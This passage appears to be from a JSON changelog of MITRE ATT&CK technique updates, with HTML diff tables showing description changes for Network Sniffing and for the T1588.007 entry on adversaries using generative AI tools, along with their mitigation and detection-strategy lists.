nowrap=\"nowrap\">echniques/T1557/001),&nbsp;can&nbsp;also&nbsp;be&nbsp;used&nbsp;to&nbsp;capture&nbsp;credential</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;websites,&nbsp;proxies,&nbsp;and&nbsp;internal&nbsp;systems&nbsp;by&nbsp;redirecting&nbsp;tra</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;to&nbsp;websites,&nbsp;proxies,&nbsp;and&nbsp;internal&nbsp;systems&nbsp;by&nbsp;redirecting&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ffic&nbsp;to&nbsp;an&nbsp;adversary.&nbsp;&nbsp;Network&nbsp;sniffing&nbsp;may&nbsp;reveal&nbsp;configura</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">traffic&nbsp;to&nbsp;an&nbsp;adversary.&nbsp;&nbsp;Network&nbsp;sniffing&nbsp;may&nbsp;reveal&nbsp;config</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;details,&nbsp;such&nbsp;as&nbsp;running&nbsp;services,&nbsp;version&nbsp;numbers,&nbsp;and</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uration&nbsp;details,&nbsp;such&nbsp;as&nbsp;running&nbsp;services,&nbsp;version&nbsp;numbers,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;other&nbsp;network&nbsp;characteristics&nbsp;(e.g.&nbsp;IP&nbsp;addresses,&nbsp;hostnames</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;other&nbsp;network&nbsp;characteristics&nbsp;(e.g.&nbsp;IP&nbsp;addresses,&nbsp;hostna</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;VLAN&nbsp;IDs)&nbsp;necessary&nbsp;for&nbsp;subsequent&nbsp;[Lateral&nbsp;Movement](http</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mes,&nbsp;VLAN&nbsp;IDs)&nbsp;necessary&nbsp;for&nbsp;subsequent&nbsp;[Lateral&nbsp;Movement](h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s://attack.mitre.org/tactics/TA0008)&nbsp;and/or&nbsp;[<span class=\"diff_chg\">Defense&nbsp;Evasion</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/tactics/TA0008)&nbsp;and/or&nbsp;[<span class=\"diff_chg\">Stealth</span>](htt</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\"></span>](https://attack.mitre.org/tactics/TA0005)&nbsp;activities.&nbsp;Adver</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps://attack.mitre.org/tactics/TA0005)&nbsp;activities.&nbsp;Adversarie</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">saries&nbsp;may&nbsp;likely&nbsp;also&nbsp;utilize&nbsp;network&nbsp;sniffing&nbsp;during&nbsp;[Adve</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;may&nbsp;likely&nbsp;also&nbsp;utilize&nbsp;network&nbsp;sniffing&nbsp;during&nbsp;[Adversary</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rsary-in-the-Middle](https://attack.mitre.org/techniques/T15</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-in-the-Middle](https://attack.mitre.org/techniques/T1557)&nbsp;(</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">57)&nbsp;(AiTM)&nbsp;to&nbsp;passively&nbsp;gain&nbsp;additional&nbsp;knowledge&nbsp;about&nbsp;the&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">AiTM)&nbsp;to&nbsp;passively&nbsp;gain&nbsp;additional&nbsp;knowledge&nbsp;about&nbsp;the&nbsp;envir</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">environment.&nbsp;&nbsp;In&nbsp;cloud-based&nbsp;environments,&nbsp;adversaries&nbsp;may&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">onment.&nbsp;&nbsp;In&nbsp;cloud-based&nbsp;environments,&nbsp;adversaries&nbsp;may&nbsp;still&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">till&nbsp;be&nbsp;able&nbsp;to&nbsp;use&nbsp;traffic&nbsp;mirroring&nbsp;services&nbsp;to&nbsp;sniff&nbsp;netw</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">be&nbsp;able&nbsp;to&nbsp;use&nbsp;traffic&nbsp;mirroring&nbsp;services&nbsp;to&nbsp;sniff&nbsp;network&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ork&nbsp;traffic&nbsp;from&nbsp;virtual&nbsp;machines.&nbsp;For&nbsp;example,&nbsp;AWS&nbsp;Traffic&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">raffic&nbsp;from&nbsp;virtual&nbsp;machines.&nbsp;For&nbsp;example,&nbsp;AWS&nbsp;Traffic&nbsp;Mirro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Mirroring,&nbsp;GCP&nbsp;Packet&nbsp;Mirroring,&nbsp;and&nbsp;Azure&nbsp;vTap&nbsp;allow&nbsp;users&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ring,&nbsp;GCP&nbsp;Packet&nbsp;Mirroring,&nbsp;and&nbsp;Azure&nbsp;vTap&nbsp;allow&nbsp;users&nbsp;to&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;define&nbsp;specified&nbsp;instances&nbsp;to&nbsp;collect&nbsp;traffic&nbsp;from&nbsp;and&nbsp;sp</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fine&nbsp;specified&nbsp;instances&nbsp;to&nbsp;collect&nbsp;traffic&nbsp;from&nbsp;and&nbsp;specifi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecified&nbsp;targets&nbsp;to&nbsp;send&nbsp;collected&nbsp;traffic&nbsp;to.(Citation:&nbsp;AWS&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;targets&nbsp;to&nbsp;send&nbsp;collected&nbsp;traffic&nbsp;to.(Citation:&nbsp;AWS&nbsp;Traff</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Traffic&nbsp;Mirroring)(Citation:&nbsp;GCP&nbsp;Packet&nbsp;Mirroring)(Citation:</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ic&nbsp;Mirroring)(Citation:&nbsp;GCP&nbsp;Packet&nbsp;Mirroring)(Citation:&nbsp;Azur</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Azure&nbsp;Virtual&nbsp;Network&nbsp;TAP)&nbsp;Often,&nbsp;much&nbsp;of&nbsp;this&nbsp;traffic&nbsp;will</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;Virtual&nbsp;Network&nbsp;TAP)&nbsp;Often,&nbsp;much&nbsp;of&nbsp;this&nbsp;traffic&nbsp;will&nbsp;be&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;be&nbsp;in&nbsp;cleartext&nbsp;due&nbsp;to&nbsp;the&nbsp;use&nbsp;of&nbsp;TLS&nbsp;termination&nbsp;at&nbsp;the&nbsp;lo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;cleartext&nbsp;due&nbsp;to&nbsp;the&nbsp;use&nbsp;of&nbsp;TLS&nbsp;termination&nbsp;at&nbsp;the&nbsp;load&nbsp;ba</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ad&nbsp;balancer&nbsp;level&nbsp;to&nbsp;reduce&nbsp;the&nbsp;strain&nbsp;of&nbsp;encrypting&nbsp;and&nbsp;dec</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lancer&nbsp;level&nbsp;to&nbsp;reduce&nbsp;the&nbsp;strain&nbsp;of&nbsp;encrypting&nbsp;and&nbsp;decrypti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rypting&nbsp;traffic.(Citation:&nbsp;Rhino&nbsp;Security&nbsp;Labs&nbsp;AWS&nbsp;VPC&nbsp;Traff</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng&nbsp;traffic.(Citation:&nbsp;Rhino&nbsp;Security&nbsp;Labs&nbsp;AWS&nbsp;VPC&nbsp;Traffic&nbsp;Mi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ic&nbsp;Mirroring)(Citation:&nbsp;SpecterOps&nbsp;AWS&nbsp;Traffic&nbsp;Mirroring)&nbsp;Th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rroring)(Citation:&nbsp;SpecterOps&nbsp;AWS&nbsp;Traffic&nbsp;Mirroring)&nbsp;The&nbsp;adv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;adversary&nbsp;can&nbsp;then&nbsp;use&nbsp;exfiltration&nbsp;techniques&nbsp;such&nbsp;as&nbsp;Tra</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersary&nbsp;can&nbsp;then&nbsp;use&nbsp;exfiltration&nbsp;techniques&nbsp;such&nbsp;as&nbsp;Transfer</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nsfer&nbsp;Data&nbsp;to&nbsp;Cloud&nbsp;Account&nbsp;in&nbsp;order&nbsp;to&nbsp;access&nbsp;the&nbsp;sniffed&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Data&nbsp;to&nbsp;Cloud&nbsp;Account&nbsp;in&nbsp;order&nbsp;to&nbsp;access&nbsp;the&nbsp;sniffed&nbsp;traffi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">raffic.(Citation:&nbsp;Rhino&nbsp;Security&nbsp;Labs&nbsp;AWS&nbsp;VPC&nbsp;Traffic&nbsp;Mirror</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">c.(Citation:&nbsp;Rhino&nbsp;Security&nbsp;Labs&nbsp;AWS&nbsp;VPC&nbsp;Traffic&nbsp;Mirroring)&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing)&nbsp;&nbsp;On&nbsp;network&nbsp;devices,&nbsp;adversaries&nbsp;may&nbsp;perform&nbsp;network&nbsp;ca</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;On&nbsp;network&nbsp;devices,&nbsp;adversaries&nbsp;may&nbsp;perform&nbsp;network&nbsp;capture</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ptures&nbsp;using&nbsp;[Network&nbsp;Device&nbsp;CLI](https://attack.mitre.org/t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;using&nbsp;[Network&nbsp;Device&nbsp;CLI](https://attack.mitre.org/techni</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">echniques/T1059/008)&nbsp;commands&nbsp;such&nbsp;as&nbsp;`monitor&nbsp;capture`.(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques/T1059/008)&nbsp;commands&nbsp;such&nbsp;as&nbsp;`monitor&nbsp;capture`.(Citation</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;US-CERT-TA18-106A)(Citation:&nbsp;capture_embedded_packet_</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">:&nbsp;US-CERT-TA18-106A)(Citation:&nbsp;capture_embedded_packet_on_so</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on_software)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ftware)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1030: Network Segmentation",
                            "M1032: Multi-factor Authentication",
                            "M1041: Encrypt Sensitive Information"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0314: Detection Strategy for Network Sniffing Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-11 13:37:31.836000+00:00",
                    "modified": "2026-04-17 16:06:03.711000+00:00",
                    "name": "Artificial Intelligence",
                    "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1684/001), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "resource-development"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1588/007",
                            "external_id": "T1588.007"
                        },
                        {
                            "source_name": "WSJ-Vishing-AI24",
                            "description": "Catherine Stupp. (2019, August 30). Fraudsters Used AI to Mimic CEO\u2019s Voice in Unusual Cybercrime Case. Retrieved March 18, 2025.",
                            "url": "https://www.wsj.com/articles/fraudsters-use-ai-to-mimic-ceos-voice-in-unusual-cybercrime-case-11567157402"
                        },
                        {
                            "source_name": "Google-Vishing24",
                            "description": "Emily Astranova, Pascal Issa. (2024, July 23). Whose Voice Is It Anyway? AI-Powered Voice Spoofing for Next-Gen Vishing Attacks. Retrieved March 18, 2025.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ai-powered-voice-spoofing-vishing-attacks"
                        },
                        {
                            "source_name": "IC3-AI24",
                            "description": "IC3. (2024, December 3). Criminals Use Generative Artificial Intelligence to Facilitate Financial Fraud. Retrieved March 18, 2025.",
                            "url": "https://www.ic3.gov/PSA/2024/PSA241203"
                        },
                        {
                            "source_name": "MSFT-AI",
                            "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/"
                        },
                        {
                            "source_name": "OpenAI-CTI",
                            "description": "OpenAI. (2024, February 14). Disrupting malicious uses of AI by state-affiliated threat actors. Retrieved September 12, 2024.",
                            "url": "https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Menachem Goldstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 16:06:03.711000+00:00\", \"old_value\": \"2025-10-24 17:48:23.190000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \\n\\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1684/001), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\\n\", \"old_value\": \"Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \\n\\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\\n\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \\n \\n-For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\\n+For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1684/001), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to14__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to14__0\"><a href=\"#difflib_chg_to14__top\">t</a></td><td class=\"diff_header\" id=\"from14_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;obtain&nbsp;access&nbsp;to&nbsp;generative&nbsp;artificial&nbsp;intel</td><td class=\"diff_next\"><a href=\"#difflib_chg_to14__top\">t</a></td><td class=\"diff_header\" id=\"to14_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;obtain&nbsp;access&nbsp;to&nbsp;generative&nbsp;artificial&nbsp;intel</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ligence&nbsp;tools,&nbsp;such&nbsp;as&nbsp;large&nbsp;language&nbsp;models&nbsp;(LLMs),&nbsp;to&nbsp;aid&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ligence&nbsp;tools,&nbsp;such&nbsp;as&nbsp;large&nbsp;language&nbsp;models&nbsp;(LLMs),&nbsp;to&nbsp;aid&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">various&nbsp;techniques&nbsp;during&nbsp;targeting.&nbsp;These&nbsp;tools&nbsp;may&nbsp;be&nbsp;used</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">various&nbsp;techniques&nbsp;during&nbsp;targeting.&nbsp;These&nbsp;tools&nbsp;may&nbsp;be&nbsp;used</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;inform,&nbsp;bolster,&nbsp;and&nbsp;enable&nbsp;a&nbsp;variety&nbsp;of&nbsp;malicious&nbsp;tasks</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;inform,&nbsp;bolster,&nbsp;and&nbsp;enable&nbsp;a&nbsp;variety&nbsp;of&nbsp;malicious&nbsp;tasks</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;including&nbsp;conducting&nbsp;[Reconnaissance](https://attack.mitre</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;including&nbsp;conducting&nbsp;[Reconnaissance](https://attack.mitre</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.org/tactics/TA0043),&nbsp;creating&nbsp;basic&nbsp;scripts,&nbsp;assisting&nbsp;soci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.org/tactics/TA0043),&nbsp;creating&nbsp;basic&nbsp;scripts,&nbsp;assisting&nbsp;soci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">al&nbsp;engineering,&nbsp;and&nbsp;even&nbsp;developing&nbsp;payloads.(Citation:&nbsp;MSFT</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">al&nbsp;engineering,&nbsp;and&nbsp;even&nbsp;developing&nbsp;payloads.(Citation:&nbsp;MSFT</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-AI)&nbsp;&nbsp;&nbsp;For&nbsp;example,&nbsp;by&nbsp;utilizing&nbsp;a&nbsp;publicly&nbsp;available&nbsp;LLM&nbsp;an</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-AI)&nbsp;&nbsp;&nbsp;For&nbsp;example,&nbsp;by&nbsp;utilizing&nbsp;a&nbsp;publicly&nbsp;available&nbsp;LLM&nbsp;an</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;adversary&nbsp;is&nbsp;essentially&nbsp;outsourcing&nbsp;or&nbsp;automating&nbsp;certain&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;adversary&nbsp;is&nbsp;essentially&nbsp;outsourcing&nbsp;or&nbsp;automating&nbsp;certain&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tasks&nbsp;to&nbsp;the&nbsp;tool.&nbsp;Using&nbsp;AI,&nbsp;the&nbsp;adversary&nbsp;may&nbsp;draft&nbsp;and&nbsp;gen</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tasks&nbsp;to&nbsp;the&nbsp;tool.&nbsp;Using&nbsp;AI,&nbsp;the&nbsp;adversary&nbsp;may&nbsp;draft&nbsp;and&nbsp;gen</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">erate&nbsp;content&nbsp;in&nbsp;a&nbsp;variety&nbsp;of&nbsp;written&nbsp;languages&nbsp;to&nbsp;be&nbsp;used&nbsp;i</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">erate&nbsp;content&nbsp;in&nbsp;a&nbsp;variety&nbsp;of&nbsp;written&nbsp;languages&nbsp;to&nbsp;be&nbsp;used&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;[Phishing](https://attack.mitre.org/techniques/T1566)/[Phi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;[Phishing](https://attack.mitre.org/techniques/T1566)/[Phi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">shing&nbsp;for&nbsp;Information](https://attack.mitre.org/techniques/T</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">shing&nbsp;for&nbsp;Information](https://attack.mitre.org/techniques/T</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">1598)&nbsp;campaigns.&nbsp;The&nbsp;same&nbsp;publicly&nbsp;available&nbsp;tool&nbsp;may&nbsp;furthe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 